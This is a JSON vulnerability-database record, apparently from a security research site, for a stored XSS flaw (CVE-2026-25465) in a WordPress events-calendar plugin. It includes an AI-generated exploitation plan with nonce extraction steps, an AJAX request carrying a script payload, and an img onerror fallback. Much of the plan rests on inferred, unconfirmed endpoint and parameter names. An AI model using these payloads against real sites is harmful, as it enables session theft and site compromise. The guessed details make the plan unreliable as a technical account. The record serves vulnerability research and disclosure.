[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fka54LozplynhtdHMFaGreCEyfTO4UmUzWC_L8Prn1UY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-25465","cp-multi-view-events-calendar-authenticated-subscriber-stored-cross-site-scripting","CP Multi View Events Calendar \u003C= 1.4.34 - Authenticated (Subscriber+) Stored Cross-Site Scripting","The CP Multi View Events Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4.34 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","cp-multi-view-calendar",null,"\u003C=1.4.34","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-17 00:00:00","2026-04-14 14:34:37",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbe4c0d73-9816-4e04-bcf8-a3be0488de7f?source=api-prod",[],"researched",false,3,"Since the source code for the plugin is not provided, this research plan is based on the vulnerability description and common architectural patterns found in the **CP Multi View Events Calendar** plugin (developed by CodePeople). The agent will first perform a discovery phase to identify the exact identifiers and endpoints.\n\n### 1. Vulnerability Summary\nThe CP Multi View Events Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via several AJAX endpoints or settings pages. The vulnerability exists because the plugin accepts user-supplied input (likely event details, titles, or calendar configurations) and stores it in the database without applying WordPress sanitization functions like `sanitize_text_field()` or `wp_kses()`. When this data is subsequently retrieved and displayed on the calendar or in the admin dashboard, it is outputted directly via `echo` without proper escaping (`esc_html` or `esc_attr`), allowing arbitrary JavaScript execution in the context of the user viewing the calendar.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action (Inferred):** Likely `mv_save_event` or `cp_multiview_save_data`. The plugin uses AJAX for most event manipulations.\n*   **Payload Parameter:** Likely `event_desc`, `event_title`, or a JSON-encoded string in a `data` parameter.\n*   **Authentication:** Authenticated, Subscriber-level or above.\n*   **Preconditions:** The plugin must be active, and at least one calendar must be created\u002Fviewable.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An AJAX handler is registered via `add_action('wp_ajax_...', ...)` or `add_action('wp_ajax_nopriv_...', ...)`.\n2.  **Input Handling:** The callback function retrieves input from `$_POST`.\n3.  **Vulnerable Sink (Storage):** The input is saved to the `wp_posts` table (as post content\u002Ftitle) or `wp_postmeta` table (as event metadata) using `update_post_meta()` without sanitization.\n4.  **Vulnerable Sink (Output):** The frontend shortcode `[cp_multiview_calendar]` or a backend calendar view retrieves this data and renders it. The code likely uses a raw `echo $variable;` inside a loop iterating through events.\n\n### 4. Nonce Acquisition Strategy\nThe agent must identify how the plugin localizes its AJAX nonce.\n\n1.  **Discovery Command:**\n    ```bash\n    grep -r \"wp_localize_script\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcp-multi-view-calendar\u002F\n    ```\n2.  **Identify the Variable:** Look for a call that passes a nonce, e.g., `wp_create_nonce('cp_multiview_nonce')`. \n3.  **JS Object Identification:** Verbatim from typical CodePeople plugins, the object is often `cp_multiview_calendar_params` or `mv_calendar_vars`.\n4.  **Extraction Steps:**\n    *   Create a page with the calendar shortcode: `wp post create --post_type=page --post_status=publish --post_content='[cp_multiview_calendar]'`\n    *   Navigate to the page using `browser_navigate`.\n    *   Extract the nonce: `browser_eval(\"window.cp_multiview_calendar_params?.nonce || window.mv_calendar_vars?.nonce\")`.\n\n### 5. Test Data Setup\nBefore exploitation, the agent should:\n1.  **Install\u002FActivate:** Ensure version 1.4.34 is active.\n2.  **Create Subscriber:** `wp user create victim_sub subscriber@example.com --role=subscriber --user_pass=password123`\n3.  **Identify a Calendar ID:** List existing calendars (if any) or create one to find an ID.\n    ```bash\n    wp post list --post_type=cp_multiview_cal\n    ```\n4.  **Create Trigger Page:** Create a public page containing the shortcode `[cp_multiview_calendar]` so the XSS can be triggered.\n\n### 6. Exploitation Strategy\nThe agent will follow these steps:\n\n**Step 1: Identify the Vulnerable Parameter**\nSearch the plugin for `update_post_meta` calls that don't have preceding sanitization:\n```bash\ngrep -rn \"update_post_meta\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcp-multi-view-calendar\u002F | grep \"\\$_POST\"\n```\n\n**Step 2: Craft the AJAX Request**\nAssuming the action is `mv_save_event` and the parameter is `event_text` (to be confirmed by Step 1):\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Cookies:** Subscriber session cookies.\n*   **Body:**\n    ```\n    action=mv_save_event&\n    nonce=[EXTRACTED_NONCE]&\n    event_id=[EXISTING_ID]&\n    event_text=\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n    ```\n\n**Step 3: Trigger the XSS**\nNavigate to the page created in the Setup phase using `browser_navigate`. If the XSS is stored correctly, the browser should execute the `alert`.\n\n### 7. Expected Results\n*   The AJAX request should return a `200 OK` or a JSON success message (e.g., `{\"status\":\"success\"}`).\n*   When navigating to the calendar page, the injected `\u003Cscript>` tag should be present in the HTML source unescaped.\n*   The `browser_navigate` tool should detect the JavaScript alert\u002Fexecution.\n\n### 8. Verification Steps\nAfter the exploit, use `wp_cli` to confirm the payload is in the database:\n```bash\n# Check post meta for the payload\nwp post meta list [EVENT_ID]\n\n# Check if the payload is in the post_content\nwp db query \"SELECT post_content FROM wp_posts WHERE post_content LIKE '%\u003Cscript>alert%';\"\n```\n\n### 9. Alternative Approaches\n*   **Calendar Settings XSS:** If event submission is not accessible to Subscribers, check for calendar configuration settings (titles, colors, labels) that might be saveable via an AJAX action that lacks a proper `current_user_can('manage_options')` check.\n*   **Shortcode Attribute Injection:** Check if the plugin allows users to save \"Custom Views\" where attributes passed to the view are reflected.\n*   **Payload Variations:** If `\u003Cscript>` is filtered by a basic WAF, use `img` tags: `\u003Cimg src=x onerror=alert(1)>`.","gemini-3-flash-preview","2026-04-18 03:02:10","2026-04-18 03:02:28",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcp-multi-view-calendar\u002Ftags"]